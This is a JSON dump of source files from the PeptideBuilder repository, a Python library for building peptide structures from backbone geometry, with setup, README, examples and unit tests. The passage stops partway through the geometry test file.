[ { "alpha_fraction": 0.6957446932792664, "alphanum_fraction": 0.7319148778915405, "avg_line_length": 18.625, "blob_id": "3714d018ffae4dbede474460b0185d4f9e6d915c", "content_id": "8a8d46938d2dcd990b8c62290f21f0ad1cbe799f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 470, "license_type": "permissive", "max_line_length": 112, "num_lines": 24, "path": "/NEWS.md", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "# Changelog\n\n## PeptideBuilder 1.1.0\n\n- It is now possible to add the terminal oxygen in a peptide via the newly added function `add_terminal_OXT()`. \n- Support for Python 2.7 has been dropped.\n- Proper unit tests have been added.\n- The code has undergone extensive clean-up, thanks to Sean Aubin.\n\n## PeptideBuilder 1.0.3\n\nMinor bug fixes.\n\n## PeptideBuilder 1.0.2\n\nPython 3 support.\n\n## PeptideBuilder 1.0.1\n\nMinor bug fixes.\n\n## PeptideBuilder 1.0\n\nFirst initial release." }, { "alpha_fraction": 0.6365384459495544, "alphanum_fraction": 0.6403846144676208, "avg_line_length": 29, "blob_id": "e6cd9fdf12ea60353f679d6e7266e37fd6cdb461", "content_id": "94fcd4ffc8f691d41b45d3aa31d8ecd0df889b66", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1560, "license_type": "permissive", "max_line_length": 73, "num_lines": 52, "path": "/setup.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from setuptools import setup\n\n\nINSTALL_REQUIRES = [\"Biopython\"]\n\nTEST_REQUIRES = [\n # testing and coverage\n \"pytest\",\n \"coverage\",\n \"pytest-cov\",\n # to be able to run `python setup.py checkdocs`\n \"collective.checkdocs\",\n \"pygments\",\n]\n\n\nwith open(\"README.md\", \"r\") as f:\n long_description = f.read()\n\nwith open(\"PeptideBuilder/__init__.py\", \"r\") as f:\n init = f.readlines()\n\nfor line in init:\n if \"__version__\" in line:\n __version__ = line.split('\"')[-2]\n\nsetup(\n name=\"PeptideBuilder\",\n version=__version__,\n author=\"Matthew Z. 
Tien\",\n author_email=\"[email protected]\",\n description=\"Create peptide PDB files with specified geometry\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/clauswilke/PeptideBuilder\",\n download_url=\"https://github.com/clauswilke/PeptideBuilder/releases\",\n platforms=\"Tested on Mac OS X and Windows 10\",\n packages=[\"PeptideBuilder\"],\n install_requires=INSTALL_REQUIRES,\n extras_require={\"test\": TEST_REQUIRES + INSTALL_REQUIRES,},\n classifiers=[\n # Trove classifiers\n # (https://pypi.python.org/pypi?%3Aaction=list_classifiers)\n \"Development Status :: 5 - Production/Stable\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: Scientific/Engineering :: Bio-Informatics\",\n \"Topic :: Scientific/Engineering :: Chemistry\",\n \"Intended Audience :: Science/Research\",\n ],\n)\n" }, { "alpha_fraction": 0.7594882845878601, "alphanum_fraction": 0.7663112878799438, "avg_line_length": 44.98039245605469, "blob_id": "ef8368efd3d82ac3ea89b03ed581c7ac241144b0", "content_id": "b33bc2e0431e5478346a1d74739422a7ce96dce9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2345, "license_type": "permissive", "max_line_length": 382, "num_lines": 51, "path": "/README.md", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "# PeptideBuilder: A simple Python library to generate model peptides.\n\n*Matthew Z. Tien, Dariya K. Sydykova, Austin G. Meyer, and Claus O. Wilke*\n\n[![PyPI version](https://badge.fury.io/py/PeptideBuilder.svg)](https://badge.fury.io/py/PeptideBuilder)\n![PyPI - Downloads](https://img.shields.io/pypi/dm/PeptideBuilder)\n![PyPI - License](https://img.shields.io/pypi/l/PeptideBuilder)\n[![Build Status](https://travis-ci.org/clauswilke/PeptideBuilder.svg?branch=master)](https://travis-ci.org/clauswilke/PeptideBuilder)\n[![Coverage Status](https://img.shields.io/codecov/c/github/clauswilke/PeptideBuilder/master.svg)](https://codecov.io/github/clauswilke/PeptideBuilder?branch=master)\n\n## Installation\n\nYou can install PeptideBuilder with pip:\n```\npip install PeptideBuilder\n```\nPeptideBuilder has one required dependency: [Biopython](https://pypi.org/project/biopython/)\n\n\n## Examples\n\nFor example usage, we encourage you to checkout the scripts in the `examples` folder and in the `tests` folder. The `examples` folder contains two scripts showing typical usage. The script `simpleExample.py` is a brief example script demonstrating basic use of the PeptideBuilder library. The script `evaluation.py` reproduces the results presented in Table 1 of Tien et al. (2013).\n\nThe file `test_PeptideBuilder.py` in `tests` contains extensive tests for the various functions provided by this library and may also be useful if you're looking for example usage.\n\n## Misc\n\nThe software is provided to you under the MIT license (see file `LICENSE.txt`).\nThe most up-to-date version of this software is available at\nhttps://github.com/clauswilke/PeptideBuilder.\n\nTo test whether your installation works properly, run `pytest` in the top-level project folder.\n\n## Contributing\n\nPull requests are welcome on GitHub. However, to be accepted, contributions must:\n1. Be styled with [`black`](https://black.readthedocs.io/en/stable/)\n2. Be linted with `pylint`\n3. Be type-checked with `mypy`\n4. 
Pass the `pytest` unit tests\n\nThus, before contributing code make sure the following commands exit without errors when run from the root directory of the Peptide Builder project:\n\n- `pytest`\n- `black .`\n- `mypy PeptideBuilder/`\n- `pylint --rcfile=setup.cfg PeptideBuilder/`\n\n**Reference:**\nM. Z. Tien, D. K. Sydykova, A. G. Meyer, C. O. Wilke (2013). PeptideBuilder:\nA simple Python library to generate model peptides. PeerJ 1:e80.\n" }, { "alpha_fraction": 0.7652173638343811, "alphanum_fraction": 0.7753623127937317, "avg_line_length": 26.600000381469727, "blob_id": "a4fe91ae703c23db3e9cb06001f2a92ab656cd53", "content_id": "460dacfd614e9ee3a7ee30a84d90d45d2de6f1fa", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 690, "license_type": "permissive", "max_line_length": 74, "num_lines": 25, "path": "/examples/simpleExample.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "\"\"\"\nSimple example script demonstrating how to use the PeptideBuilder library.\n\nThe script generates a peptide consisting of six arginines in alpha-helix\nconformation, and it stores the peptide under the name \"example.pdb\".\n\"\"\"\n\nfrom PeptideBuilder import Geometry\nimport PeptideBuilder\n\n# create a peptide consisting of 6 glycines\ngeo = Geometry.geometry(\"G\")\ngeo.phi = -60\ngeo.psi_im1 = -40\nstructure = PeptideBuilder.initialize_res(geo)\nfor i in range(5):\n PeptideBuilder.add_residue(structure, geo)\n# add terminal oxygen (OXT) to the final glycine\nPeptideBuilder.add_terminal_OXT(structure)\n\nimport Bio.PDB\n\nout = Bio.PDB.PDBIO()\nout.set_structure(structure)\nout.save(\"example.pdb\")\n" }, { "alpha_fraction": 0.6985507011413574, "alphanum_fraction": 0.7072463631629944, "avg_line_length": 30.363636016845703, "blob_id": "41bb7ecb53e5f691a9523bda21eaea3019a979db", "content_id": "9ff9c13da5fcac98dd22a3647d8fd9209a24a76c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "permissive", "max_line_length": 103, "num_lines": 11, "path": "/PeptideBuilder/__init__.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "\"\"\"``PeptideBuilder`` package for creating peptide models in PDB format based on geometrical parameters\nWritten by Matthew Z. Tien, Dariya K. Sydykova, Austin G. Meyer, and Claus O. 
Wilke.\nPython modules\n----------------\nThe package consists of the following Python modules:\n* PeptideBuilder\n* Geometry\n\"\"\"\n__version__ = \"1.1.0\"\nfrom .PeptideBuilder import *\nfrom .Geometry import *\n" }, { "alpha_fraction": 0.5058394074440002, "alphanum_fraction": 0.5260036587715149, "avg_line_length": 28.945354461669922, "blob_id": "6c1b6290e6600c4c33708db8cbb6ecca2077488d", "content_id": "9a3df431d10080f3bac7b5d2a503e9e2f19fd070", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10960, "license_type": "permissive", "max_line_length": 188, "num_lines": 366, "path": "/examples/evaluation.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from pathlib import Path\nimport math\n\nfrom Bio.PDB import PDBIO\nfrom Bio.PDB import PDBParser\nfrom Bio.PDB import Superimposer\nfrom Bio.PDB.vectors import calc_angle, calc_dihedral\n\nfrom PeptideBuilder import Geometry\nimport PeptideBuilder\n\n\nresdict = {\n \"ALA\": \"A\",\n \"CYS\": \"C\",\n \"ASP\": \"D\",\n \"GLU\": \"E\",\n \"PHE\": \"F\",\n \"GLY\": \"G\",\n \"HIS\": \"H\",\n \"ILE\": \"I\",\n \"LYS\": \"K\",\n \"LEU\": \"L\",\n \"MET\": \"M\",\n \"ASN\": \"N\",\n \"PRO\": \"P\",\n \"GLN\": \"Q\",\n \"ARG\": \"R\",\n \"SER\": \"S\",\n \"THR\": \"T\",\n \"VAL\": \"V\",\n \"TRP\": \"W\",\n \"TYR\": \"Y\",\n}\n\nPDBdir = \"PDBs\"\n\n\ndef build_linear_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n for res in chain:\n if res.get_resname() in resdict.keys():\n tempgeo = Geometry.geometry(resdict[res.get_resname()])\n model_structure_geo.append(tempgeo)\n model_structure = PeptideBuilder.initialize_res(model_structure_geo[0])\n for i in range(1, len(model_structure_geo)):\n model_structure = PeptideBuilder.add_residue(\n model_structure, model_structure_geo[i]\n )\n\n return model_structure\n\n\ndef make_pdb_file(struct, file_nom):\n outfile = PDBIO()\n outfile.set_structure(struct)\n outfile.save(Path(PDBdir, file_nom))\n return file_nom\n\n\ndef build_backbone_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n prev = \"0\"\n N_prev = \"0\"\n CA_prev = \"0\"\n CO_prev = \"0\"\n ##O_prev=\"0\"\n prev_res = \"\"\n rad = 180.0 / math.pi\n for res in chain:\n if res.get_resname() in resdict.keys():\n geo = Geometry.geometry(resdict[res.get_resname()])\n if prev == \"0\":\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n prev = \"1\"\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n ##o1=O_prev.get_vector()\n\n ##O_curr=res['O']\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n ##o=O_curr.get_vector()\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n geo.CA_C_N_angle = calc_angle(ca1, c1, n) * rad\n geo.C_N_CA_angle = calc_angle(c1, n, ca) * rad\n geo.CA_N_length = CA_curr - N_curr\n geo.CA_C_length = CA_curr - C_curr\n geo.peptide_bond = N_curr - C_prev\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca) ##goes to current res\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n geo.psi_im1 = psi * rad\n geo.omega = omega * rad\n geo.phi = phi * rad\n\n geo.CA_N_length 
= CA_curr - N_curr\n geo.CA_C_length = CA_curr - C_curr\n ##geo.C_O_length= C_curr - O_curr\n\n geo.N_CA_C_angle = calc_angle(n, ca, c) * rad\n ##geo.CA_C_O_angle= calc_angle(ca, c, o)*rad\n\n ##geo.N_CA_C_O= calc_dihedral(n, ca, c, o)*rad\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n\n model_structure_geo.append(geo)\n return model_structure_geo\n\n\ndef build_all_angles_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n model_structure_geo = []\n prev = \"0\"\n N_prev = \"0\"\n CA_prev = \"0\"\n CO_prev = \"0\"\n prev_res = \"\"\n rad = 180.0 / math.pi\n for res in chain:\n if res.get_resname() in resdict.keys():\n geo = Geometry.geometry(resdict[res.get_resname()])\n if prev == \"0\":\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n prev = \"1\"\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n geo.CA_C_N_angle = calc_angle(ca1, c1, n) * rad\n geo.C_N_CA_angle = calc_angle(c1, n, ca) * rad\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca) ##goes to current res\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n geo.psi_im1 = psi * rad\n geo.omega = omega * rad\n geo.phi = phi * rad\n\n geo.N_CA_C_angle = calc_angle(n, ca, c) * rad\n ##geo.CA_C_O_angle= calc_angle(ca, c, o)*rad\n\n ##geo.N_CA_C_O= calc_dihedral(n, ca, c, o)*rad\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n ##O_prev=res['O']\n\n model_structure_geo.append(geo)\n return model_structure_geo\n\n\ndef build_phi_psi_model(pdb_filename):\n parser = PDBParser()\n structure = parser.get_structure(\"sample\", Path(PDBdir, pdb_filename))\n model = structure[0]\n chain = model[\"A\"]\n seq = \"\"\n phi_diangle = []\n psi_diangle = []\n omega_diangle = []\n for res in chain:\n if res.get_resname() in resdict.keys():\n\n seq += resdict[res.get_resname()]\n if len(seq) == 1:\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n else:\n n1 = N_prev.get_vector()\n ca1 = CA_prev.get_vector()\n c1 = C_prev.get_vector()\n\n C_curr = res[\"C\"]\n N_curr = res[\"N\"]\n CA_curr = res[\"CA\"]\n\n c = C_curr.get_vector()\n n = N_curr.get_vector()\n ca = CA_curr.get_vector()\n\n psi = calc_dihedral(n1, ca1, c1, n) ##goes to current res\n omega = calc_dihedral(ca1, c1, n, ca)\n phi = calc_dihedral(c1, n, ca, c) ##goes to current res\n\n phi_diangle.append(phi * 180.0 / math.pi)\n psi_diangle.append(psi * 180.0 / math.pi)\n omega_diangle.append(omega * 180.0 / math.pi)\n\n N_prev = res[\"N\"]\n CA_prev = res[\"CA\"]\n C_prev = res[\"C\"]\n\n model_structure_omega = PeptideBuilder.make_structure(\n seq, phi_diangle, psi_diangle, omega_diangle\n )\n model_structure_phi_psi = PeptideBuilder.make_structure(\n seq, phi_diangle, psi_diangle\n )\n return model_structure_omega, model_structure_phi_psi\n\n\ndef compare_structure(reference, alternate):\n parser = PDBParser()\n\n ref_struct = parser.get_structure(\"Reference\", Path(PDBdir, reference))\n alt_struct = parser.get_structure(\"Alternate\", Path(PDBdir, alternate))\n\n ref_model = ref_struct[0]\n ref_chain = ref_model[\"A\"]\n\n alt_model = alt_struct[0]\n alt_chain = alt_model[\"A\"]\n\n ref_atoms = []\n alt_atoms = 
[]\n\n    for ref_res in ref_chain:\n        if ref_res.get_resname() in resdict.keys():\n            ref_atoms.append(ref_res[\"CA\"])\n\n    for alt_res in alt_chain:\n        if alt_res.get_resname() in resdict.keys():\n            alt_atoms.append(alt_res[\"CA\"])\n\n    super_imposer = Superimposer()\n    super_imposer.set_atoms(ref_atoms, alt_atoms)\n    super_imposer.apply(alt_model.get_atoms())\n\n    make_pdb_file(alt_struct, \"Aligned_\" + alternate)\n\n    full = super_imposer.rms\n\n    super_imposer_50 = Superimposer()\n    super_imposer_50.set_atoms(ref_atoms[:50], alt_atoms[:50])\n    super_imposer_50.apply(alt_model.get_atoms())\n\n    make_pdb_file(alt_struct, \"Aligned_50_\" + alternate)\n\n    f_50 = super_imposer_50.rms\n\n    super_imposer_150 = Superimposer()\n    super_imposer_150.set_atoms(ref_atoms[:150], alt_atoms[:150])\n    super_imposer_150.apply(alt_model.get_atoms())\n\n    make_pdb_file(alt_struct, \"Aligned_150_\" + alternate)\n\n    f_150 = super_imposer_150.rms\n\n    return f_50, f_150, full, len(ref_atoms)\n\n\ndef test_PeptideBuilder(pdb_code):\n    # retrieve pdb file\n    pdb_file = \"%s_clean.pdb\" % (pdb_code)\n\n    # build backbone model from all angles and bond lengths\n    structure_backbone = PeptideBuilder.make_structure_from_geos(\n        build_backbone_model(pdb_file)\n    )\n\n    # build backbone model from all angles\n    structure_all_angles = PeptideBuilder.make_structure_from_geos(\n        build_all_angles_model(pdb_file)\n    )\n\n    # build models from dihedral angles only\n    structure_omega, structure_phi_psi = build_phi_psi_model(pdb_file)\n\n    # compare models to original structure\n    RMS_backbone_50, RMS_backbone_150, RMS_backbone, size = compare_structure(\n        pdb_file, make_pdb_file(structure_backbone, \"Backbone_\" + pdb_file)\n    )\n    RMS_phi_psi_50, RMS_phi_psi_150, RMS_phi_psi, size = compare_structure(\n        pdb_file, make_pdb_file(structure_phi_psi, \"PhiPsi_\" + pdb_file)\n    )\n    RMS_omega_50, RMS_omega_150, RMS_omega, size = compare_structure(\n        pdb_file, make_pdb_file(structure_omega, \"PhiPsiOmega_\" + pdb_file)\n    )\n    RMS_all_angles_50, RMS_all_angles_150, RMS_all_angles, size = compare_structure(\n        pdb_file, make_pdb_file(structure_all_angles, \"AllAngles_\" + pdb_file)\n    )\n    output_line = (\n        \"%s\\t%i\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\t%0.1f\\n\"\n        % (\n            pdb_code,\n            size,\n            RMS_phi_psi_50,\n            RMS_phi_psi_150,\n            RMS_phi_psi,\n            RMS_omega_50,\n            RMS_omega_150,\n            RMS_omega,\n            RMS_all_angles_50,\n            RMS_all_angles_150,\n            RMS_all_angles,\n            RMS_backbone_50,\n            RMS_backbone_150,\n            RMS_backbone,\n        )\n    )\n    return output_line\n\n\ntest_structures = [\n    \"1aq7\",\n    \"1gfl\",\n    \"1nbw\",\n    \"1vca\",\n    \"2o6r\",\n    \"2r83\",\n    \"3cap\",\n    \"3cuq\",\n    \"3vni\",\n    \"7tim\",\n]\n\nf_out = open(\"reconstructed_RMSDs.txt\", \"w\")\nf_out.write(\n    \"PDB-ID\\tlength\\tPhi-Psi-50\\tPhi-Psi-150\\tPhi-Psi\\tPhi-Psi-Omega-50\\tPhi-Psi-Omega-150\\tPhi-Psi-Omega\\tAll-Angles-50\\tAll-Angles-150\\tAll-Angles\\tBackbone-50\\tBackbone-150\\tBackbone\\n\"\n)\nfor i in test_structures:\n    print(i)\n    f_out.write(test_PeptideBuilder(i))\nf_out.close()\n" }, { "alpha_fraction": 0.655634343624115, "alphanum_fraction": 0.6719858050346375, "avg_line_length": 29.95121955871582, "blob_id": "2368de5a95b208eb5464b2763d74bcbd87b4fbd5", "content_id": "c26bbfce1c26f4e32e5d508201158dbd5a5042fb", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5076, "license_type": "permissive", "max_line_length": 86, "num_lines": 164, "path": "/tests/test_PeptideBuilder.py", "repo_name": 
"Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from pathlib import Path\n\nfrom Bio.PDB.Polypeptide import PPBuilder\nfrom Bio.PDB import PDBParser\n\nimport PeptideBuilder\nfrom PeptideBuilder import Geometry\n\n\ndef compare_residues(r1, r2) -> bool:\n if not r1 == r2:\n return False\n if not len(list(r1.get_atoms())) == len(list(r2.get_atoms())):\n return False\n\n result = True\n for a1, a2 in zip(r1, r2):\n result = result and (abs(a1.coord - a2.coord) < 0.001).all()\n\n return result\n\n\ndef compare_to_reference(structure, ref_file) -> bool:\n parser = PDBParser()\n ref_structure = parser.get_structure(\"test\", str(Path(\"tests\", \"pdbs\", ref_file)))\n\n res = list(list(structure[0])[0])\n ref_res = list(list(ref_structure[0])[0])\n if not len(res) == len(ref_res):\n return False\n\n result = True\n for r1, r2 in zip(res, ref_res):\n result = result and compare_residues(r1, r2)\n\n return result\n\n\ndef test_add_residue():\n \"\"\"\n Build a peptide containing all 20 amino acids\n \"\"\"\n structure = PeptideBuilder.initialize_res(\"A\")\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n PeptideBuilder.add_residue(structure, aa)\n\n # extract peptide from structure and compare to expected\n ppb = PPBuilder()\n pp = next(iter(ppb.build_peptides(structure)))\n assert pp.get_sequence() == \"ACDEFGHIKLMNPQRSTVWY\"\n\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_add_residue2():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying backbone angles\n \"\"\"\n phi = -60\n psi_im1 = -40\n geo = Geometry.geometry(\"A\")\n geo.phi = phi\n geo.psi_im1 = psi_im1\n structure = PeptideBuilder.initialize_res(geo)\n\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n phi += 1\n psi_im1 -= 1\n geo = Geometry.geometry(aa)\n geo.phi = phi\n geo.psi_im1 = psi_im1\n PeptideBuilder.add_residue(structure, geo)\n\n assert compare_to_reference(structure, \"helix.pdb\")\n\n\ndef test_make_structure_from_geos():\n \"\"\"Build a helix containing all 20 amino acids from list of geometries.\n The structure should be identical to `extended.pdb`\n \"\"\"\n geos = [Geometry.geometry(aa) for aa in \"ACDEFGHIKLMNPQRSTVWY\"]\n structure = PeptideBuilder.make_structure_from_geos(geos)\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_extended_structure():\n \"\"\"\n Build a peptide containing all 20 amino acids in extended conformation.\n The structure should be identical to `extended.pdb`\n \"\"\"\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVWY\")\n assert compare_to_reference(structure, \"extended.pdb\")\n\n # test unit tests by comparing structures that don't match\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVW\")\n assert not compare_to_reference(structure, \"extended.pdb\")\n structure = PeptideBuilder.make_extended_structure(\"ACDEFGHIKLMNPQRSTVWW\")\n assert not compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_structure_from_geos2():\n \"\"\"\n Build a peptide containing all 20 amino acids from list of geometries.\n The structure should be identical to `extended.pdb`\n \"\"\"\n geos = [Geometry.geometry(aa) for aa in \"ACDEFGHIKLMNPQRSTVWY\"]\n structure = PeptideBuilder.make_structure_from_geos(geos)\n assert compare_to_reference(structure, \"extended.pdb\")\n\n\ndef test_make_structure():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying\n backbone angles, using make_structure().\n The resulting structure should be identical to `helix.pdb`\n 
\"\"\"\n phi_list = []\n psi_im1_list = []\n\n for i in range(1, 20):\n phi_list.append(-60 + i)\n psi_im1_list.append(-40 - i)\n structure = PeptideBuilder.make_structure(\n \"ACDEFGHIKLMNPQRSTVWY\", phi_list, psi_im1_list\n )\n assert compare_to_reference(structure, \"helix.pdb\")\n\n\ndef test_make_structure2():\n \"\"\"\n Build a helix containing all 20 amino acids, with slowly varying\n backbone angles, using make_structure(). Now we're changing omega also.\n The first half of the resulting structure should be identical to\n `helix.pdb`, while the second half should be slightly different.\n \"\"\"\n phi_list = []\n psi_im1_list = []\n omega_list = []\n\n for i in range(1, 20):\n phi_list.append(-60 + i)\n psi_im1_list.append(-40 - i)\n omega_list.append(180)\n\n for i in range(9, 19):\n omega_list[i] = -178\n\n structure = PeptideBuilder.make_structure(\n \"ACDEFGHIKLMNPQRSTVWY\", phi_list, psi_im1_list, omega_list\n )\n assert compare_to_reference(structure, \"helix2.pdb\")\n\n\ndef test_add_terminal_OXT():\n \"\"\"\n Build a peptide with terminal OXT\n \"\"\"\n structure = PeptideBuilder.initialize_res(\"A\")\n for aa in \"CDEFGHIKLMNPQRSTVWY\":\n PeptideBuilder.add_residue(structure, aa)\n PeptideBuilder.add_terminal_OXT(structure)\n assert compare_to_reference(structure, \"extended_OXT.pdb\")\n # check that presence of OXT is tested\n assert not compare_to_reference(structure, \"extended.pdb\")\n" }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 15.899999618530273, "blob_id": "9eea5ae3ac9b9f8f351570b36ae7bc8ef016e74b", "content_id": "46a19405079eb66be725e6148b4bd6f5ac36947f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 168, "license_type": "permissive", "max_line_length": 35, "num_lines": 10, "path": "/pytest.ini", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "[pytest]\ntestpaths = \n tests\n# PeptideBuilder\nnorecursedirs = dist build examples\naddopts =\n --doctest-modules\n --cov=PeptideBuilder\n -r a\n -v" }, { "alpha_fraction": 0.4838283956050873, "alphanum_fraction": 0.6051862239837646, "avg_line_length": 30.942771911621094, "blob_id": "af220c57b1ac53a007a12ee40ea53dfcaa6f25ca", "content_id": "adcb043c1a19db92074ed88a1e6709216fbe294b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21210, "license_type": "permissive", "max_line_length": 45, "num_lines": 664, "path": "/tests/test_Geometry.py", "repo_name": "Lun4m/PeptideBuilder", "src_encoding": "UTF-8", "text": "from PeptideBuilder.Geometry import (\n AlaGeo,\n ArgGeo,\n AsnGeo,\n AspGeo,\n CysGeo,\n GlnGeo,\n GluGeo,\n GlyGeo,\n HisGeo,\n IleGeo,\n LeuGeo,\n LysGeo,\n MetGeo,\n PheGeo,\n ProGeo,\n SerGeo,\n ThrGeo,\n TrpGeo,\n TyrGeo,\n ValGeo,\n)\nfrom PeptideBuilder import Geometry\n\n# test all geometries for correct parameters\ndef test_geometry_A():\n g = Geometry.geometry(\"A\")\n assert isinstance(g, AlaGeo)\n\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_C_O_diangle == -60.5\n assert g.N_CA_C_angle == 111.068\n assert g.N_C_CA_CB_diangle == 122.686\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == 
\"A\"\n\n\ndef test_geometry_C():\n g = Geometry.geometry(\"C\")\n assert isinstance(g, CysGeo)\n\n assert g.CA_CB_SG_angle == 113.8169\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.5\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_SG_length == 1.808\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_SG_diangle == -62.2\n assert g.N_CA_C_O_diangle == -60.0\n assert g.N_CA_C_angle == 110.8856\n assert g.N_C_CA_CB_diangle == 122.5037\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"C\"\n\n\ndef test_geometry_D():\n g = Geometry.geometry(\"D\")\n assert isinstance(g, AspGeo)\n\n assert g.CA_CB_CG_OD1_diangle == -46.7\n assert g.CA_CB_CG_OD2_diangle == 133.3\n assert g.CA_CB_CG_angle == 113.06\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.51\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_OD1_angle == 119.22\n assert g.CB_CG_OD2_angle == 118.218\n assert g.CB_CG_length == 1.52\n assert g.CG_OD1_length == 1.25\n assert g.CG_OD2_length == 1.25\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -66.4\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 111.03\n assert g.N_C_CA_CB_diangle == 122.82\n assert g.omega == 180.0\n assert g.peptide_bond == 1.33\n assert g.phi == -120\n assert g.psi_im1 == 140\n assert g.residue_name == \"D\"\n\n\ndef test_geometry_E():\n g = Geometry.geometry(\"E\")\n assert isinstance(g, GluGeo)\n\n assert g.CA_CB_CG_CD_diangle == -179.8\n assert g.CA_CB_CG_angle == 113.82\n assert g.CA_CB_length == 1.52\n assert g.CA_C_N_angle == 116.642992978143\n assert g.CA_C_O_angle == 120.511\n assert g.CA_C_length == 1.52\n assert g.CA_N_length == 1.46\n assert g.CB_CG_CD_OE1_diangle == -6.2\n assert g.CB_CG_CD_OE2_diangle == 173.8\n assert g.CB_CG_CD_angle == 113.31\n assert g.CB_CG_length == 1.52\n assert g.CD_OE1_length == 1.25\n assert g.CD_OE2_length == 1.25\n assert g.CG_CD_OE1_angle == 119.02\n assert g.CG_CD_OE2_angle == 118.08\n assert g.CG_CD_length == 1.52\n assert g.C_CA_CB_angle == 109.5\n assert g.C_N_CA_angle == 121.382215820277\n assert g.C_O_length == 1.23\n assert g.N_CA_CB_CG_diangle == -63.8\n assert g.N_CA_C_O_diangle == 120.0\n assert g.N_CA_C_angle == 